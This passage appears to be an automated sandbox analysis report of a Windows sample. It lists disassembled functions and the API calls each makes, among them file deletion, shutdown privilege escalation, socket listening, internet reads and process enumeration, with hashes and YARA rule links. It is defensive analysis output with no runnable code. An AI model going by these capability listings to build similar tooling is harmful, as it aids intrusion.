                                                    • Part of subcall function 00BF4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BF4743,?,?,00BF37AE,?), ref: 00BF4770
                                                    • Part of subcall function 00C54A31: GetFileAttributesW.KERNEL32(?,00C5370B), ref: 00C54A32
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00C53B89
                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C53BD9
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C53BEA
                                                  • FindClose.KERNEL32(00000000), ref: 00C53C01
                                                  • FindClose.KERNEL32(00000000), ref: 00C53C0A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                  • String ID: \*.*
                                                  • API String ID: 2649000838-1173974218
                                                  • Opcode ID: 2f19dce765ce901916e213c609688254be2791b23a8ad9bdd22e4b860981f076
                                                  • Instruction ID: fb38bf3b5cafd896155c10594ef04397bffbfb5e035a8dead8805a6f2f00a6e7
                                                  • Opcode Fuzzy Hash: 2f19dce765ce901916e213c609688254be2791b23a8ad9bdd22e4b860981f076
                                                  • Instruction Fuzzy Hash: C83190350083899BC301EF24C8919BFB7E8AE95305F404E6DF9E597191EF209A4DC767
                                                  Function 00C551BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C487E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C4882B
                                                    • Part of subcall function 00C487E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C48858
                                                    • Part of subcall function 00C487E1: GetLastError.KERNEL32 ref: 00C48865
                                                  • ExitWindowsEx.USER32(?,00000000), ref: 00C551F9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                  • String ID: $@$SeShutdownPrivilege
                                                  • API String ID: 2234035333-194228
                                                  • Opcode ID: 275cc5d1750c983367cef8de307f2b60eed2f74a0a5d476f463e692294757e94
                                                  • Instruction ID: 2401bfcba5ad9b729a1021d3e76ffb18d5490db3975f73c24f93d75f18462bba
                                                  • Opcode Fuzzy Hash: 275cc5d1750c983367cef8de307f2b60eed2f74a0a5d476f463e692294757e94
                                                  • Instruction Fuzzy Hash: 6F012B397916116BF72C62699CBAFBF7258EB05343F200425FD27E20D2D9511DC98798
                                                  Function 00C66283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C662DC
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C662EB
                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00C66307
                                                  • listen.WSOCK32(00000000,00000005), ref: 00C66316
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C66330
                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00C66344
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                  • String ID:
                                                  • API String ID: 1279440585-0
                                                  • Opcode ID: d84b0512515f8039ed49e36cbfbf66a8c6b1009c952111ec3e2f12a7f31bbe22
                                                  • Instruction ID: 851c890c286f380cefe6a454a29cf53fdd0b682ce8794ddb7249a37c131fd856
                                                  • Opcode Fuzzy Hash: d84b0512515f8039ed49e36cbfbf66a8c6b1009c952111ec3e2f12a7f31bbe22
                                                  • Instruction Fuzzy Hash: 2721A0316002049FCB10EF64C889B7EB7E9EF49720F148569E96AA73E1C770AD46CB51
                                                  Function 00C05520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C10DB6: std::exception::exception.LIBCMT ref: 00C10DEC
                                                    • Part of subcall function 00C10DB6: __CxxThrowException@8.LIBCMT ref: 00C10E01
                                                  • _memmove.LIBCMT ref: 00C40258
                                                  • _memmove.LIBCMT ref: 00C4036D
                                                  • _memmove.LIBCMT ref: 00C40414
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                  • String ID:
                                                  • API String ID: 1300846289-0
                                                  • Opcode ID: 3605ddf99f2487977b8c7bf119ab64bc6092b6caf4427e80dc3ff670b606648e
                                                  • Instruction ID: e8daf732b367a7e48cdd42a4226322da54b4025b2aaa55d46a9220160d70f39d
                                                  • Opcode Fuzzy Hash: 3605ddf99f2487977b8c7bf119ab64bc6092b6caf4427e80dc3ff670b606648e
                                                  • Instruction Fuzzy Hash: 6502DF70A00209DBCF04DF65D981ABEBBF5FF49300F2080A9E906DB295EB71DA54DB91
                                                  Function 00BF1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF2612: GetWindowLongW.USER32(?,000000EB), ref: 00BF2623
                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 00BF19FA
                                                  • GetSysColor.USER32(0000000F), ref: 00BF1A4E
                                                  • SetBkColor.GDI32(?,00000000), ref: 00BF1A61
                                                    • Part of subcall function 00BF1290: DefDlgProcW.USER32(?,00000020,?), ref: 00BF12D8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ColorProc$LongWindow
                                                  • String ID:
                                                  • API String ID: 3744519093-0
                                                  • Opcode ID: d3023e19b568f3cff3497d39d78f57680597f02b467fc35ba99c5760a862569d
                                                  • Instruction ID: cf83355f87c3b8c7ef633715781ff0d0bfd797568e67c60546fe009058d6b8b4
                                                  • Opcode Fuzzy Hash: d3023e19b568f3cff3497d39d78f57680597f02b467fc35ba99c5760a862569d
                                                  • Instruction Fuzzy Hash: A8A1467011255CFAE628AB2D9CC4F7F36ECDB42341F144E99F732D3592CA219E45A2B2
                                                  Function 00C5BCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00C5BCE6
                                                  • _wcscmp.LIBCMT ref: 00C5BD16
                                                  • _wcscmp.LIBCMT ref: 00C5BD2B
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00C5BD3C
                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00C5BD6C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Find$File_wcscmp$CloseFirstNext
                                                  • String ID:
                                                  • API String ID: 2387731787-0
                                                  • Opcode ID: 8629f1efeafcf5f8d011c8553a8b15925a0cd7de7c3680db5700e6d7d86a4166
                                                  • Instruction ID: 7f62f1a1b6d31ee3aef6b8cc5994b52fd961ad861c35253156f64dfb2da96050
                                                  • Opcode Fuzzy Hash: 8629f1efeafcf5f8d011c8553a8b15925a0cd7de7c3680db5700e6d7d86a4166
                                                  • Instruction Fuzzy Hash: 70517C396046069FC714DF28C491EAAB7F4EF4A320F10455DEA6A873A1DB30ED89CB95
                                                  Function 00C66747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C67D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C67DB6
                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C6679E
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C667C7
                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00C66800
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C6680D
                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00C66821
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                  • String ID:
                                                  • API String ID: 99427753-0
                                                  • Opcode ID: 61c9ba8b5e7841e17d8fbd08c41e9962431f21d80b624558926f545fb8c59c69
                                                  • Instruction ID: 23cebe57e661f6cc01aeb7725e6ad5d0c356fc789b3f441ec2c6e6755e5ac5ed
                                                  • Opcode Fuzzy Hash: 61c9ba8b5e7841e17d8fbd08c41e9962431f21d80b624558926f545fb8c59c69
                                                  • Instruction Fuzzy Hash: 5341A475A00214AFDB10AF64CC86F7E77E8DF45754F0485ACFA19AB3D2CA709D058B91
                                                  Function 00C75376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                  • String ID:
                                                  • API String ID: 292994002-0
                                                  • Opcode ID: dd9fd9e3a768db7aa142b6cd34c28a193eae7ce10e9c3c6150a5e18e9e3a4930
                                                  • Instruction ID: c82d2d6e7f514097d7f649a6be54df6423a9b8cdb867e1ebca06e8e47ae84b2f
                                                  • Opcode Fuzzy Hash: dd9fd9e3a768db7aa142b6cd34c28a193eae7ce10e9c3c6150a5e18e9e3a4930
                                                  • Instruction Fuzzy Hash: 7811C4317009156FDB216F26DC84B6E7B9CFF447A1B408029F95ED7261CBF0DD428AA0
                                                  Function 00C480A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C480C0
                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C480CA
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C480D9
                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C480E0
                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C480F6
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 44706859-0
                                                  • Opcode ID: b5dc5c9173a1c4f8deefe425aee7475322d36495de5fe58d4df09b4d0bbd863f
                                                  • Instruction ID: b4914d4ebdf77f47e62cf104aff82f84ea667fed02bdcaee076abff77c19e726
                                                  • Opcode Fuzzy Hash: b5dc5c9173a1c4f8deefe425aee7475322d36495de5fe58d4df09b4d0bbd863f
                                                  • Instruction Fuzzy Hash: 35F04F31240204AFEB101FA5ECCDF6F3BACFF4A755F40002AF959C6150CA619D86EA60
                                                  Function 00C5C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 00C5C432
                                                  • CoCreateInstance.OLE32(00C82D6C,00000000,00000001,00C82BDC,?), ref: 00C5C44A
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                  • CoUninitialize.OLE32 ref: 00C5C6B7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CreateInitializeInstanceUninitialize_memmove
                                                  • String ID: .lnk
                                                  • API String ID: 2683427295-24824748
                                                  • Opcode ID: db1e47f62d4b00243a5e063412be93a8d5e7d69fb50e5df5c5e96f1a47c50c8f
                                                  • Instruction ID: 39435332b8f7f12c9b0bdecca2cfacf6366e2361c8a2710fa91096c19fdde934
                                                  • Opcode Fuzzy Hash: db1e47f62d4b00243a5e063412be93a8d5e7d69fb50e5df5c5e96f1a47c50c8f
                                                  • Instruction Fuzzy Hash: E1A129B1104209AFD700EF64C881EBFB7E8EF85354F00496DF6559B1A2DB71EA49CB62
                                                  Function 00BF4B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00BF4AD0), ref: 00BF4B45
                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00BF4B57
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                  • API String ID: 2574300362-192647395
                                                  • Opcode ID: ebb54e6cb694e6738710134a4854729f90bd8bfe360ce2ed6e2f97074f01fa75
                                                  • Instruction ID: 01ac56d719db8e72047a9e46fe8443267c8b6d52c1381f046aa8da6c11518c91
                                                  • Opcode Fuzzy Hash: ebb54e6cb694e6738710134a4854729f90bd8bfe360ce2ed6e2f97074f01fa75
                                                  • Instruction Fuzzy Hash: 5DD01735A10717CFD7209F32E8A8B1A76E4AF05391F11C8BE948AD6151E770E8C1CA58
                                                  Function 00C03030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: __itow__swprintf
                                                  • String ID:
                                                  • API String ID: 674341424-0
                                                  • Opcode ID: f9b04a61d21b0150e535469c8eea463d7bacbdad86498a6442b08068c64b440d
                                                  • Instruction ID: dd0d5bd9a13564f104d4d269b4a1e62347047970078732eb70ca217ab46e15d3
                                                  • Opcode Fuzzy Hash: f9b04a61d21b0150e535469c8eea463d7bacbdad86498a6442b08068c64b440d
                                                  • Instruction Fuzzy Hash: BE2290716083409FC724DF64C881B6FB7E8BF85710F10891DF59A9B291DB71EA49CB92
                                                  Function 00C6EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00C6EE3D
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00C6EE4B
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00C6EF0B
                                                  • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00C6EF1A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                  • String ID:
                                                  • API String ID: 2576544623-0
                                                  • Opcode ID: 83a32e8b3dcf5d395d1e352b6d1cdbbce961dd7390d1d709cfd254336e62b270
                                                  • Instruction ID: d49b1ed47083657816432bcbc2275a9423715290806261b266759905c5c35611
                                                  • Opcode Fuzzy Hash: 83a32e8b3dcf5d395d1e352b6d1cdbbce961dd7390d1d709cfd254336e62b270
                                                  • Instruction Fuzzy Hash: AA518D71104704AFD320EF24DC85F6BB7E8EF94750F40486DF695972A1EB70A909CB92
                                                  Function 00C4E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00C4E628
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: lstrlen
                                                  • String ID: ($|
                                                  • API String ID: 1659193697-1631851259
                                                  • Opcode ID: 5b3c10622eb53a12bd67b2f4c2ddd6e67226cf7cd2e25c6b755f205222477712
                                                  • Instruction ID: a505d3fff6e033882bf25ba68cdf5a499815bf946a920a17d2de1f2132cce40e
                                                  • Opcode Fuzzy Hash: 5b3c10622eb53a12bd67b2f4c2ddd6e67226cf7cd2e25c6b755f205222477712
                                                  • Instruction Fuzzy Hash: 77322775A007059FDB28DF19C4819AAB7F1FF48320B16C56EE8AADB3A1D770E941CB44
                                                  Function 00C622EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C6180A,00000000), ref: 00C623E1
                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00C62418
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                  • String ID:
                                                  • API String ID: 599397726-0
                                                  • Opcode ID: bb496459dcb19781984085cb5c2c7ecb96778b04638b3e2601639690bc157a3d
                                                  • Instruction ID: a0b73ac1f2231f32d37f4b27f6ac79daf7740eade0e3fdbceb1abc926ce5c2e3
                                                  • Opcode Fuzzy Hash: bb496459dcb19781984085cb5c2c7ecb96778b04638b3e2601639690bc157a3d
                                                  • Instruction Fuzzy Hash: D241D471904A09BFEB30DE95DCC5FFBB7ACEB40324F10406AF655A6250EB749E81A660
                                                  Function 00C5B3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00C5B40B
                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00C5B465
                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00C5B4B2
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
